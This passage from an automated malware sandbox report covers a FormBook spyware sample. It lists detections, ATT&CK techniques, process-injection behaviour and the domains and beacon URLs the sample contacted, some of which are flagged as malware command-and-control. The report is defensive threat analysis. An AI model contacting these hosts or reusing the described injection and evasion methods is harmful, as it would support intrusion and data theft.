          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsTimestomp1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458773 Sample: V5cfxBHd71.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 29 www.mercuryaid.net 2->29 31 mercuryaid.net 2->31 33 2 other IPs or domains 2->33 51 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->51 53 Multi AV Scanner detection for domain / URL 2->53 55 Found malware configuration 2->55 57 8 other signatures 2->57 10 V5cfxBHd71.exe 3 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\...\V5cfxBHd71.exe.log, ASCII 10->27 dropped 59 Tries to detect virtualization through RDTSC time measurements 10->59 14 V5cfxBHd71.exe 10->14         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 14->61 63 Maps a DLL or memory area into another process 14->63 65 Sample uses process hollowing technique 14->65 67 Queues an APC in another process (thread injection) 14->67 17 msdt.exe 14->17         started        20 explorer.exe 14->20 injected process9 dnsIp10 41 Modifies the context of a thread in another process (thread injection) 17->41 43 Maps a DLL or memory area into another process 17->43 45 Tries to detect virtualization through RDTSC time measurements 17->45 23 cmd.exe 1 17->23         started        35 vectoroutlines.com 198.54.126.105, 49726, 80 NAMECHEAP-NETUS United States 20->35 37 www.vectoroutlines.com 20->37 39 7 other IPs or domains 20->39 47 System process connects to network (likely due to code injection or exploit) 20->47 49 Performs DNS queries to domains with low reputation 20->49 signatures11 process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          V5cfxBHd71.exe29%VirustotalBrowse
          V5cfxBHd71.exe30%ReversingLabsByteCode-MSIL.Spyware.Noon
          V5cfxBHd71.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.V5cfxBHd71.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.hazard-protection.com2%VirustotalBrowse
          3cheer.com2%VirustotalBrowse
          www.leonardocarrillo.com1%VirustotalBrowse
          vectoroutlines.com6%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.tiro.comFI0%Avira URL Cloudsafe
          http://www.fontbureau.comFQ0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/90%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/:0%Avira URL Cloudsafe
          http://www.fontbureau.comcom:0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/90%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/:0%URL Reputationsafe
          http://www.fontbureau.comF50%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/ch0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/f0%Avira URL Cloudsafe
          http://www.fontbureau.comF:0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/)0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.fontbureau.comgrito0%URL Reputationsafe
          http://www.fontbureau.comrsiv0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fontbureau.comR.TTF0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/help50%Avira URL Cloudsafe
          http://www.fontbureau.comcomd0%URL Reputationsafe
          http://www.fontbureau.comdy0%Avira URL Cloudsafe
          http://www.fontbureau.co0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/C0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htmo0%Avira URL Cloudsafe
          http://www.fontbureau.comueTFC0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          http://www.urwpp.debI0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/y0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.boogerstv.com/p2io/?BJ=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7jRLyNqpfuRL&b2Ml9=0txtgJLXY6ULB100%Avira URL Cloudmalware
          http://www.fontbureau.com.TTF50%Avira URL Cloudsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.fontbureau.comalsFC0%Avira URL Cloudsafe
          http://www.fontbureau.comals0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/f0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/nly0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/d0%URL Reputationsafe
          http://www.vectoroutlines.com/p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULB100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/tion0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.hazard-protection.com
          148.59.128.71
          truefalseunknown
          3cheer.com
          34.102.136.180
          truefalseunknown
          parkingpage.namecheap.com
          198.54.117.218
          truefalse
            high
            www.leonardocarrillo.com
            172.107.55.6
            truefalseunknown
            vectoroutlines.com
            198.54.126.105
            truetrueunknown
            mercuryaid.net
            223.29.234.230
            truetrue
              unknown
              www.tpcgzwlpyggm.mobi
              unknown
              unknowntrue
                unknown
                www.boogerstv.com
                unknown
                unknowntrue
                  unknown
                  www.m678.xyz
                  unknown
                  unknowntrue
                    unknown
                    www.kce0728com.net
                    unknown
                    unknowntrue
                      unknown
                      www.mercuryaid.net
                      unknown
                      unknowntrue
                        unknown
                        www.vectoroutlines.com
                        unknown
                        unknowntrue
                          unknown
                          www.3cheer.com
                          unknown
                          unknowntrue
                            unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            www.adultpeace.com/p2io/true
                            • URL Reputation: safe
                            low
                            http://www.boogerstv.com/p2io/?BJ=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7jRLyNqpfuRL&b2Ml9=0txtgJLXY6ULBtrue
                            • Avira URL Cloud: malware
                            unknown
                            http://www.vectoroutlines.com/p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULBtrue
                            • Avira URL Cloud: malware
                            unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.tiro.comFIV5cfxBHd71.exe, 00000000.00000003.236412505.000000000627E000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.com/designersGV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/?V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                high
                                http://www.fontbureau.comFQV5cfxBHd71.exe, 00000000.00000003.243584347.000000000627F000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.founder.com.cn/cn/bTheV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers?V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designersEV5cfxBHd71.exe, 00000000.00000003.249525924.00000000062A9000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.tiro.comexplorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designersexplorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.goodfont.co.krV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/jp/9V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/jp/:V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.comcom:V5cfxBHd71.exe, 00000000.00000003.243584347.000000000627F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.sajatypeworks.comV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/9V5cfxBHd71.exe, 00000000.00000003.238966135.0000000006273000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.typography.netDV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cn/cTheV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/:V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.comF5V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmV5cfxBHd71.exe, 00000000.00000003.245511901.00000000062A9000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/chV5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://fontfabrik.comV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/jp/fV5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designersbV5cfxBHd71.exe, 00000000.00000003.243484955.00000000062A9000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.fontbureau.comF:V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.galapagosdesign.com/DPleaseV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/)V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/Y0V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.comgritoV5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.comrsivV5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fonts.comV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.sandoll.co.krV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleaseV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deV5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cnV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameV5cfxBHd71.exe, 00000000.00000002.257959634.00000000031D1000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.sakkal.comV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.comR.TTFV5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.apache.org/licenses/LICENSE-2.0V5cfxBHd71.exe, 00000000.00000003.236794650.00000000062AE000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                                high
